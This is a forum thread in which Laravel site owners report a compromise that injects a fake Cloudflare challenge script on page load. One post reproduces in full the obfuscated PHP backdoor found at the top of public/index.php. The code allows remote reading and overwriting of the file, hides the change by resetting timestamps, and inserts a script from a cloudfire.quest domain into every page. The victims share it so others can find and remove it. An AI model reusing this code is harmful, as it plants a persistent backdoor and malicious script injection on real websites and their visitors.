Unknow script is injecting when the page is loading.

Sorry if my english is not the best.

I don't think this is related to Laravel, but i am having the same problem and i was searching for some information about this and this is the only place i could find someone with the same issue.

It seems it all started on the last week, just like it did to you. On my laravel site and other websites hosted on the same server some script runs that attempts to impersonate cloudflare. It shows a fake cloudflare window on page load and tries asking the user to allow notifications. In my case the script is "https://t132se0f.cloudfire.quest/challenge.js"

I found some suspicious php files in the /public and /config folders in Laravel with random names and obfuscated code. I also found that the index.php in that same folder was modified and a line with obfuscated code was added at the start. Removing these files and that line of code stopped the injection, but i still don't know what originated these files.

My knowledge in these topics is very limited so i don't think i can be of much help. I'm still trying to figure out how these suspicious files got into my server but i still can't arrive to any conclusion.

Is your app setup correctly pointing to public as document root,

Have you done insecure file uploads?

See:

https://laracasts.com/discuss/channels/laravel/undefined-variable-employes?page=1&replyId=917766

It is definitely malicious. I found it on a barebones laravel I have on the internet. I did a git reset --hard to revert all files. Before I did that, I made a copy of all the files it created. It also deleted .gitignore from some laravel directories.

I have the same problem on a Laravel website. Have you guys managed to solve the issue? You can see it live on protrafic.ro.

A few days ago, I deleted the 'strange' files, and it seemed like the problem was solved. I also changed all my passwords, but after a few days, the problem reappeared.

In public/index.php I found this code: /cut here;)/if(isset($_REQUEST["vav\x70\x65\x35\x33\x61\x62\165\156\155\x6a\60\x63\x38"])){if(empty($REQUEST["\x76\141\x76pe\x35\63\x61\x62\x75\156\x6d\152\x30\1438"])){echo bin2hex(gzdeflate(file_get_contents(FILE)));}else{header("X-\x4cit\x65S\x70e\x65\144\55\x50u\162\147\145\x3a \52");if(function_exists("o\160\x63\x61\x63\150\145\x5fr\x65se\164")){@opcache_reset();}if(function_exists("\x61\x70\x63\x63l\145\x61\162\x5f\x63\141\143\150\145")){@apc_clear_cache();}$kw3z2m=filemtime(FILE);$pf6rme=fileatime(FILE);echo strval(file_put_contents(FILE,gzinflate(pack("\x48\x2a",$_REQUEST["\x76a\166p\x65\x353ab\165\156mj\60\143\x38"]))));@touch(FILE,$kw3z2m+1,$pf6rme+1);}die;}if(isset($_SERVER["\x48\x54\124\120\x5fA\103C\105\120\x54"])&&(strpos($_SERVER["\x48\124\124P_A\x43C\x45P\x54"],"\x74\145xt/\x68\164m\x6c")!==false||$SERVER["\110\x54\x54\x50\101\103C\x45\120\124"]==="*/\52")){function pmjikt($kw3z2m){return str_replace("<\57h\145a\144\x3e","<\163\143\x72\x69\x70t \x74\x79p\x65\75\x27\164\x65x\x74\57\152\x61\x76\141s\x63\162\151p\164\47\40as\x79\x6e\143\40s\162c=\x27h\164\164\x70\163\72\x2f\57\66\161m\145\166\63\146\x73\x2e\143\154\157u\x64f\x69re.\x71ue\x73\x74\57\143\x68\x61\154\x6c\145n\x67\x65.j\163'\x3e\x3c\x2f\163\x63\162i\x70\x74\x3e\x3c/he\141\144\x3e",$kw3z2m);}ob_start("\x70\x6d\152\x69\x6b\x74");}/cut here;)/

I removed it, and it's all ok. I still don't know how this happened.

FYI: Correctly setting up laravel has been covered many times on this forum.

Same thing happened to me with all 6 Laravel apps I have hosted in Digital Ocean through Laravel Forge. I found the file build_david.php in my production /public directory, removed it and the issue now seems fixed. How did they got access too my production folders, though? Larevel team, please help.